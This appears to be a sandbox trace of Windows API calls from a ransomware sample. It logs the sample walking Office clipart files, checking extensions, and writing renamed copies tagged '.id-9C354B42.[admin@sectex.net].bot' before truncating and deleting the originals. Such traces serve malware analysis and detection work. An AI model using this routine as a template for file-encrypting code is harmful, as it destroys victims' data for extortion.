	[0162.520] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0162.520] lstrlenW (lpString=".ppt") returned 4
	[0162.520] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 63
	[0162.520] lstrlenW (lpString=".zip") returned 4
	[0162.520] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.520] lstrlenW (lpString=".rar") returned 4
	[0162.520] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.520] lstrlenW (lpString=".bz2") returned 4
	[0162.520] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.520] lstrlenW (lpString=".7z") returned 3
	[0162.520] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 63
	[0162.520] lstrlenW (lpString=".dbf") returned 4
	[0162.521] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 63
	[0162.521] lstrlenW (lpString=".1cd") returned 4
	[0162.521] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 63
	[0162.521] lstrlenW (lpString=".jpg") returned 4
	[0162.521] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.521] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.521] lstrlenW (lpString="J0107658.WMF") returned 12
	[0162.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107658.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.521] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=7072) returned 1
	[0162.522] CloseHandle (hObject=0x3b8) returned 1
	[0162.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107658.wmf")) returned 0x20
	[0162.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107658.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107658.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.522] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.522] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107658.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0162.523] GetLastError () returned 0x0
	[0162.523] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1ba0, lpOverlapped=0x0) returned 1
	[0162.553] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1bb0, lpOverlapped=0x0) returned 1
	[0162.554] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.554] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.554] SetEndOfFile (hFile=0x25c) returned 1
	[0162.910] CloseHandle (hObject=0x25c) returned 1
	[0162.910] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.910] SetEndOfFile (hFile=0x3b8) returned 1
	[0162.912] CloseHandle (hObject=0x3b8) returned 1
	[0162.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.041] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107658.wmf")) returned 1
	[0163.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 63
	[0163.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 63
	[0163.157] lstrlenW (lpString=".doc") returned 4
	[0163.157] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.157] lstrlenW (lpString=".docx") returned 5
	[0163.157] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0163.157] lstrlenW (lpString=".pdf") returned 4
	[0163.157] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.157] lstrlenW (lpString=".xls") returned 4
	[0163.157] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.157] lstrlenW (lpString=".xlsx") returned 5
	[0163.157] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0163.157] lstrlenW (lpString=".ppt") returned 4
	[0163.157] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 63
	[0163.157] lstrlenW (lpString=".zip") returned 4
	[0163.157] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.157] lstrlenW (lpString=".rar") returned 4
	[0163.158] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.158] lstrlenW (lpString=".bz2") returned 4
	[0163.158] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.158] lstrlenW (lpString=".7z") returned 3
	[0163.158] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 63
	[0163.158] lstrlenW (lpString=".dbf") returned 4
	[0163.158] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 63
	[0163.158] lstrlenW (lpString=".1cd") returned 4
	[0163.158] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 63
	[0163.158] lstrlenW (lpString=".jpg") returned 4
	[0163.158] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 63
	[0163.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 63
	[0163.158] lstrlenW (lpString=".doc") returned 4
	[0163.158] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.158] lstrlenW (lpString=".docx") returned 5
	[0163.158] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0163.158] lstrlenW (lpString=".pdf") returned 4
	[0163.158] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.158] lstrlenW (lpString=".xls") returned 4
	[0163.158] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.158] lstrlenW (lpString=".xlsx") returned 5
	[0163.158] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0163.158] lstrlenW (lpString=".ppt") returned 4
	[0163.158] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 63
	[0163.158] lstrlenW (lpString=".zip") returned 4
	[0163.158] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.158] lstrlenW (lpString=".rar") returned 4
	[0163.158] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.158] lstrlenW (lpString=".bz2") returned 4
	[0163.159] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.159] lstrlenW (lpString=".7z") returned 3
	[0163.159] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 63
	[0163.159] lstrlenW (lpString=".dbf") returned 4
	[0163.159] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 63
	[0163.159] lstrlenW (lpString=".1cd") returned 4
	[0163.159] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 63
	[0163.159] lstrlenW (lpString=".jpg") returned 4
	[0163.159] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.159] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.159] lstrlenW (lpString="J0107748.WMF") returned 12
	[0163.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107748.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.160] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=8224) returned 1
	[0163.160] CloseHandle (hObject=0x37c) returned 1
	[0163.160] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107748.wmf")) returned 0x20
	[0163.160] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107748.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107748.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.160] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.160] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107748.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0163.161] GetLastError () returned 0x0
	[0163.161] ReadFile (in: hFile=0x37c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x2020, lpOverlapped=0x0) returned 1
	[0163.176] WriteFile (in: hFile=0x3f0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x2030, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x2030, lpOverlapped=0x0) returned 1
	[0163.177] ReadFile (in: hFile=0x37c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.177] WriteFile (in: hFile=0x3f0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.178] SetEndOfFile (hFile=0x3f0) returned 1
	[0163.178] CloseHandle (hObject=0x3f0) returned 1
	[0163.178] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.178] SetEndOfFile (hFile=0x37c) returned 1
	[0163.180] CloseHandle (hObject=0x37c) returned 1
	[0163.180] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.180] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107748.wmf")) returned 1
	[0163.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 63
	[0163.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 63
	[0163.181] lstrlenW (lpString=".doc") returned 4
	[0163.181] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.181] lstrlenW (lpString=".docx") returned 5
	[0163.181] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0163.181] lstrlenW (lpString=".pdf") returned 4
	[0163.181] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.181] lstrlenW (lpString=".xls") returned 4
	[0163.181] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.181] lstrlenW (lpString=".xlsx") returned 5
	[0163.181] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0163.181] lstrlenW (lpString=".ppt") returned 4
	[0163.181] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 63
	[0163.181] lstrlenW (lpString=".zip") returned 4
	[0163.181] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.181] lstrlenW (lpString=".rar") returned 4
	[0163.181] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.181] lstrlenW (lpString=".bz2") returned 4
	[0163.181] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.181] lstrlenW (lpString=".7z") returned 3
	[0163.181] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 63
	[0163.182] lstrlenW (lpString=".dbf") returned 4
	[0163.182] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 63
	[0163.182] lstrlenW (lpString=".1cd") returned 4
	[0163.182] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 63
	[0163.182] lstrlenW (lpString=".jpg") returned 4
	[0163.182] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 63
	[0163.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 63
	[0163.182] lstrlenW (lpString=".doc") returned 4
	[0163.182] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.182] lstrlenW (lpString=".docx") returned 5
	[0163.182] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0163.182] lstrlenW (lpString=".pdf") returned 4
	[0163.182] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.182] lstrlenW (lpString=".xls") returned 4
	[0163.182] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.182] lstrlenW (lpString=".xlsx") returned 5
	[0163.182] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0163.182] lstrlenW (lpString=".ppt") returned 4
	[0163.182] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 63
	[0163.182] lstrlenW (lpString=".zip") returned 4
	[0163.182] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.182] lstrlenW (lpString=".rar") returned 4
	[0163.182] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.182] lstrlenW (lpString=".bz2") returned 4
	[0163.182] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.182] lstrlenW (lpString=".7z") returned 3
	[0163.182] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 63
	[0163.182] lstrlenW (lpString=".dbf") returned 4
	[0163.182] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 63
	[0163.183] lstrlenW (lpString=".1cd") returned 4
	[0163.183] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 63
	[0163.183] lstrlenW (lpString=".jpg") returned 4
	[0163.183] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.183] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.183] lstrlenW (lpString="J0136865.WMF") returned 12
	[0163.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0136865.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.195] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=16710) returned 1
	[0163.195] CloseHandle (hObject=0x37c) returned 1
	[0163.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0136865.wmf")) returned 0x20
	[0163.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0136865.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0136865.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.216] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.216] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0136865.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0163.217] GetLastError () returned 0x0
	[0163.217] ReadFile (in: hFile=0x3c4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x4146, lpOverlapped=0x0) returned 1
	[0163.221] WriteFile (in: hFile=0x1d8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x4150, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x4150, lpOverlapped=0x0) returned 1
	[0163.222] ReadFile (in: hFile=0x3c4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.222] WriteFile (in: hFile=0x1d8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.222] SetEndOfFile (hFile=0x1d8) returned 1
	[0163.222] CloseHandle (hObject=0x1d8) returned 1
	[0163.222] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.222] SetEndOfFile (hFile=0x3c4) returned 1
	[0163.224] CloseHandle (hObject=0x3c4) returned 1
	[0163.225] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.225] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0136865.wmf")) returned 1
	[0163.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 63
	[0163.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 63
	[0163.225] lstrlenW (lpString=".doc") returned 4
	[0163.225] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.225] lstrlenW (lpString=".docx") returned 5
	[0163.226] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0163.226] lstrlenW (lpString=".pdf") returned 4
	[0163.226] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.226] lstrlenW (lpString=".xls") returned 4
	[0163.226] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.226] lstrlenW (lpString=".xlsx") returned 5
	[0163.226] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0163.226] lstrlenW (lpString=".ppt") returned 4
	[0163.226] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 63
	[0163.226] lstrlenW (lpString=".zip") returned 4
	[0163.226] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.226] lstrlenW (lpString=".rar") returned 4
	[0163.226] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.226] lstrlenW (lpString=".bz2") returned 4
	[0163.226] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.226] lstrlenW (lpString=".7z") returned 3
	[0163.226] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 63
	[0163.226] lstrlenW (lpString=".dbf") returned 4
	[0163.226] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 63
	[0163.226] lstrlenW (lpString=".1cd") returned 4
	[0163.226] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 63
	[0163.226] lstrlenW (lpString=".jpg") returned 4
	[0163.226] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 63
	[0163.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 63
	[0163.226] lstrlenW (lpString=".doc") returned 4
	[0163.226] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.226] lstrlenW (lpString=".docx") returned 5
	[0163.226] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0163.226] lstrlenW (lpString=".pdf") returned 4
	[0163.226] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.227] lstrlenW (lpString=".xls") returned 4
	[0163.227] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.227] lstrlenW (lpString=".xlsx") returned 5
	[0163.227] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0163.227] lstrlenW (lpString=".ppt") returned 4
	[0163.227] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 63
	[0163.227] lstrlenW (lpString=".zip") returned 4
